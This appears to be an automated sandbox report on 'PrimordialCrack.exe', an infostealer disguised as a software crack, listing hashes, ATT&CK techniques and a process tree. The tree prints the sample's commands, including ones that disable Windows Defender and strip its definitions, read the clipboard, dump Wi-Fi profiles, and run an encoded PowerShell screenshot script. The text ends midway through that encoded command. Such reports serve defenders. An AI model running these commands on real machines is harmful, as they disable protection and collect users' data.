801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793

Resubmissions

28-10-2024 19:00

241028-xnwrrsvfpn 10

28-10-2024 18:32

241028-w6smdsvcra 10

28-10-2024 18:30

241028-w5wbwsspdt 10

28-10-2024 17:56

241028-wh5l2svbpf 10

Analysis

max time kernel
4s
max time network
8s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-10-2024 18:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PrimordialCrack.exe
Size

7.5MB
MD5

0738a5a832b62e68a740aa3401d332ef
SHA1

3f3b0acdc4cc580de58495ca3b5a2aa305362825
SHA256

801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793
SHA512

0f008f61aa87d1efb5c83f1bf701112565aee0b2991645e36e0e10d0aa415e9b8ed9972bf847cba90bfd2549d1233599b6c9adc174e354e181d267cbe51429ce
SSDEEP

196608:wct1WurErvI9pWjgaAnajMsK2CfQCS/OinHC1e:dt1WurEUWjJjYRoPhHYe

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
780	powershell.exe
2220	powershell.exe
4628	powershell.exe
4556	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3472	powershell.exe
448	cmd.exe

Loads dropped DLL 17 IoCs

pid	Process
4772	PrimordialCrack.exe
4772	PrimordialCrack.exe
4772	PrimordialCrack.exe
4772	PrimordialCrack.exe
4772	PrimordialCrack.exe
4772	PrimordialCrack.exe
4772	PrimordialCrack.exe
4772	PrimordialCrack.exe
4772	PrimordialCrack.exe
4772	PrimordialCrack.exe
4772	PrimordialCrack.exe
4772	PrimordialCrack.exe
4772	PrimordialCrack.exe
4772	PrimordialCrack.exe
4772	PrimordialCrack.exe
4772	PrimordialCrack.exe
4772	PrimordialCrack.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
4032	tasklist.exe
4084	tasklist.exe
2004	tasklist.exe

UPX packed file 39 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000a000000023b86-21.dat	upx
behavioral1/memory/4772-25-0x00007FFED1080000-0x00007FFED1745000-memory.dmp	upx
behavioral1/files/0x000a000000023b79-27.dat	upx
behavioral1/memory/4772-29-0x00007FFEE5160000-0x00007FFEE5185000-memory.dmp	upx
behavioral1/files/0x000a000000023b84-31.dat	upx
behavioral1/memory/4772-48-0x00007FFEE9520000-0x00007FFEE952F000-memory.dmp	upx
behavioral1/files/0x000a000000023b80-47.dat	upx
behavioral1/files/0x000a000000023b7f-46.dat	upx
behavioral1/files/0x000a000000023b7e-45.dat	upx
behavioral1/files/0x000a000000023b7d-44.dat	upx
behavioral1/files/0x000a000000023b7c-43.dat	upx
behavioral1/files/0x000a000000023b7b-42.dat	upx
behavioral1/files/0x000a000000023b7a-41.dat	upx
behavioral1/files/0x000a000000023b78-40.dat	upx
behavioral1/files/0x000a000000023b8b-39.dat	upx
behavioral1/files/0x000a000000023b8a-38.dat	upx
behavioral1/files/0x000a000000023b89-37.dat	upx
behavioral1/files/0x000a000000023b85-34.dat	upx
behavioral1/files/0x000a000000023b83-33.dat	upx
behavioral1/memory/4772-54-0x00007FFEDD140000-0x00007FFEDD16D000-memory.dmp	upx
behavioral1/memory/4772-58-0x00007FFEDB140000-0x00007FFEDB164000-memory.dmp	upx
behavioral1/memory/4772-57-0x00007FFEE6470000-0x00007FFEE648A000-memory.dmp	upx
behavioral1/memory/4772-60-0x00007FFED0E40000-0x00007FFED0FBE000-memory.dmp	upx
behavioral1/memory/4772-64-0x00007FFEE0490000-0x00007FFEE049D000-memory.dmp	upx
behavioral1/memory/4772-66-0x00007FFED7380000-0x00007FFED73B3000-memory.dmp	upx
behavioral1/memory/4772-63-0x00007FFEDD200000-0x00007FFEDD219000-memory.dmp	upx
behavioral1/memory/4772-71-0x00007FFED0B80000-0x00007FFED0C4D000-memory.dmp	upx
behavioral1/memory/4772-74-0x00007FFEE5160000-0x00007FFEE5185000-memory.dmp	upx
behavioral1/memory/4772-73-0x00007FFED0650000-0x00007FFED0B79000-memory.dmp	upx
behavioral1/memory/4772-76-0x00007FFEDC2F0000-0x00007FFEDC304000-memory.dmp	upx
behavioral1/memory/4772-82-0x00007FFED0530000-0x00007FFED064B000-memory.dmp	upx
behavioral1/memory/4772-81-0x00007FFEDB140000-0x00007FFEDB164000-memory.dmp	upx
behavioral1/memory/4772-79-0x00007FFEDD130000-0x00007FFEDD13D000-memory.dmp	upx
behavioral1/memory/4772-78-0x00007FFEDD140000-0x00007FFEDD16D000-memory.dmp	upx
behavioral1/memory/4772-70-0x00007FFED1080000-0x00007FFED1745000-memory.dmp	upx
behavioral1/memory/4772-85-0x00007FFED0E40000-0x00007FFED0FBE000-memory.dmp	upx
behavioral1/memory/4772-309-0x00007FFED7380000-0x00007FFED73B3000-memory.dmp	upx
behavioral1/memory/4772-314-0x00007FFED0B80000-0x00007FFED0C4D000-memory.dmp	upx
behavioral1/memory/4772-330-0x00007FFED0650000-0x00007FFED0B79000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2988	cmd.exe
4564	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3328	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4092	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
4556	powershell.exe
4556	powershell.exe
780	powershell.exe
780	powershell.exe
780	powershell.exe
780	powershell.exe
4556	powershell.exe
4556	powershell.exe
2072	powershell.exe
2072	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
2072	powershell.exe
2220	powershell.exe
2220	powershell.exe
2220	powershell.exe
3148	powershell.exe
3148	powershell.exe
3148	powershell.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

description	pid	Process
Token: SeDebugPrivilege	4556	powershell.exe
Token: SeDebugPrivilege	780	powershell.exe
Token: SeDebugPrivilege	4032	tasklist.exe
Token: SeDebugPrivilege	4084	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4640	WMIC.exe
Token: SeSecurityPrivilege	4640	WMIC.exe
Token: SeTakeOwnershipPrivilege	4640	WMIC.exe
Token: SeLoadDriverPrivilege	4640	WMIC.exe
Token: SeSystemProfilePrivilege	4640	WMIC.exe
Token: SeSystemtimePrivilege	4640	WMIC.exe
Token: SeProfSingleProcessPrivilege	4640	WMIC.exe
Token: SeIncBasePriorityPrivilege	4640	WMIC.exe
Token: SeCreatePagefilePrivilege	4640	WMIC.exe
Token: SeBackupPrivilege	4640	WMIC.exe
Token: SeRestorePrivilege	4640	WMIC.exe
Token: SeShutdownPrivilege	4640	WMIC.exe
Token: SeDebugPrivilege	4640	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4640	WMIC.exe
Token: SeRemoteShutdownPrivilege	4640	WMIC.exe
Token: SeUndockPrivilege	4640	WMIC.exe
Token: SeManageVolumePrivilege	4640	WMIC.exe
Token: 33	4640	WMIC.exe
Token: 34	4640	WMIC.exe
Token: 35	4640	WMIC.exe
Token: 36	4640	WMIC.exe
Token: SeDebugPrivilege	2004	tasklist.exe
Token: SeDebugPrivilege	2072	powershell.exe
Token: SeDebugPrivilege	3472	powershell.exe
Token: SeIncreaseQuotaPrivilege	4640	WMIC.exe
Token: SeSecurityPrivilege	4640	WMIC.exe
Token: SeTakeOwnershipPrivilege	4640	WMIC.exe
Token: SeLoadDriverPrivilege	4640	WMIC.exe
Token: SeSystemProfilePrivilege	4640	WMIC.exe
Token: SeSystemtimePrivilege	4640	WMIC.exe
Token: SeProfSingleProcessPrivilege	4640	WMIC.exe
Token: SeIncBasePriorityPrivilege	4640	WMIC.exe
Token: SeCreatePagefilePrivilege	4640	WMIC.exe
Token: SeBackupPrivilege	4640	WMIC.exe
Token: SeRestorePrivilege	4640	WMIC.exe
Token: SeShutdownPrivilege	4640	WMIC.exe
Token: SeDebugPrivilege	4640	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4640	WMIC.exe
Token: SeRemoteShutdownPrivilege	4640	WMIC.exe
Token: SeUndockPrivilege	4640	WMIC.exe
Token: SeManageVolumePrivilege	4640	WMIC.exe
Token: 33	4640	WMIC.exe
Token: 34	4640	WMIC.exe
Token: 35	4640	WMIC.exe
Token: 36	4640	WMIC.exe
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeDebugPrivilege	3148	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3896 wrote to memory of 4772	3896	PrimordialCrack.exe	84
PID 3896 wrote to memory of 4772	3896	PrimordialCrack.exe	84
PID 4772 wrote to memory of 5044	4772	PrimordialCrack.exe	88
PID 4772 wrote to memory of 5044	4772	PrimordialCrack.exe	88
PID 4772 wrote to memory of 532	4772	PrimordialCrack.exe	89
PID 4772 wrote to memory of 532	4772	PrimordialCrack.exe	89
PID 532 wrote to memory of 780	532	cmd.exe	92
PID 532 wrote to memory of 780	532	cmd.exe	92
PID 5044 wrote to memory of 4556	5044	cmd.exe	93
PID 5044 wrote to memory of 4556	5044	cmd.exe	93
PID 4772 wrote to memory of 3208	4772	PrimordialCrack.exe	94
PID 4772 wrote to memory of 3208	4772	PrimordialCrack.exe	94
PID 4772 wrote to memory of 5112	4772	PrimordialCrack.exe	95
PID 4772 wrote to memory of 5112	4772	PrimordialCrack.exe	95
PID 4772 wrote to memory of 3980	4772	PrimordialCrack.exe	98
PID 4772 wrote to memory of 3980	4772	PrimordialCrack.exe	98
PID 4772 wrote to memory of 448	4772	PrimordialCrack.exe	99
PID 4772 wrote to memory of 448	4772	PrimordialCrack.exe	99
PID 4772 wrote to memory of 4908	4772	PrimordialCrack.exe	100
PID 4772 wrote to memory of 4908	4772	PrimordialCrack.exe	100
PID 4772 wrote to memory of 464	4772	PrimordialCrack.exe	101
PID 4772 wrote to memory of 464	4772	PrimordialCrack.exe	101
PID 4772 wrote to memory of 2988	4772	PrimordialCrack.exe	102
PID 4772 wrote to memory of 2988	4772	PrimordialCrack.exe	102
PID 4772 wrote to memory of 1228	4772	PrimordialCrack.exe	103
PID 4772 wrote to memory of 1228	4772	PrimordialCrack.exe	103
PID 3208 wrote to memory of 4032	3208	cmd.exe	104
PID 3208 wrote to memory of 4032	3208	cmd.exe	104
PID 4772 wrote to memory of 4176	4772	PrimordialCrack.exe	105
PID 4772 wrote to memory of 4176	4772	PrimordialCrack.exe	105
PID 5112 wrote to memory of 4084	5112	cmd.exe	113
PID 5112 wrote to memory of 4084	5112	cmd.exe	113
PID 1228 wrote to memory of 4092	1228	cmd.exe	114
PID 1228 wrote to memory of 4092	1228	cmd.exe	114
PID 4176 wrote to memory of 2072	4176	cmd.exe	116
PID 4176 wrote to memory of 2072	4176	cmd.exe	116
PID 3980 wrote to memory of 4640	3980	cmd.exe	117
PID 3980 wrote to memory of 4640	3980	cmd.exe	117
PID 448 wrote to memory of 3472	448	cmd.exe	118
PID 448 wrote to memory of 3472	448	cmd.exe	118
PID 2988 wrote to memory of 4564	2988	cmd.exe	137
PID 2988 wrote to memory of 4564	2988	cmd.exe	137
PID 4908 wrote to memory of 2004	4908	cmd.exe	120
PID 4908 wrote to memory of 2004	4908	cmd.exe	120
PID 464 wrote to memory of 2264	464	cmd.exe	121
PID 464 wrote to memory of 2264	464	cmd.exe	121
PID 4772 wrote to memory of 2532	4772	PrimordialCrack.exe	133
PID 4772 wrote to memory of 2532	4772	PrimordialCrack.exe	133
PID 2532 wrote to memory of 3004	2532	cmd.exe	124
PID 2532 wrote to memory of 3004	2532	cmd.exe	124
PID 4772 wrote to memory of 4480	4772	PrimordialCrack.exe	125
PID 4772 wrote to memory of 4480	4772	PrimordialCrack.exe	125
PID 4480 wrote to memory of 948	4480	cmd.exe	127
PID 4480 wrote to memory of 948	4480	cmd.exe	127
PID 2072 wrote to memory of 3676	2072	powershell.exe	128
PID 2072 wrote to memory of 3676	2072	powershell.exe	128
PID 4772 wrote to memory of 4464	4772	PrimordialCrack.exe	129
PID 4772 wrote to memory of 4464	4772	PrimordialCrack.exe	129
PID 4464 wrote to memory of 3308	4464	cmd.exe	131
PID 4464 wrote to memory of 3308	4464	cmd.exe	131
PID 4772 wrote to memory of 4488	4772	PrimordialCrack.exe	132
PID 4772 wrote to memory of 4488	4772	PrimordialCrack.exe	132
PID 4488 wrote to memory of 3724	4488	cmd.exe	134
PID 4488 wrote to memory of 3724	4488	cmd.exe	134

C:\Users\Admin\AppData\Local\Temp\PrimordialCrack.exe
"C:\Users\Admin\AppData\Local\Temp\PrimordialCrack.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3896
- C:\Users\Admin\AppData\Local\Temp\PrimordialCrack.exe
  "C:\Users\Admin\AppData\Local\Temp\PrimordialCrack.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\PrimordialCrack.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5044
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\PrimordialCrack.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:532
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3208
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5112
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3980
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4908
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:464
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:2988
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1228
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4176
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC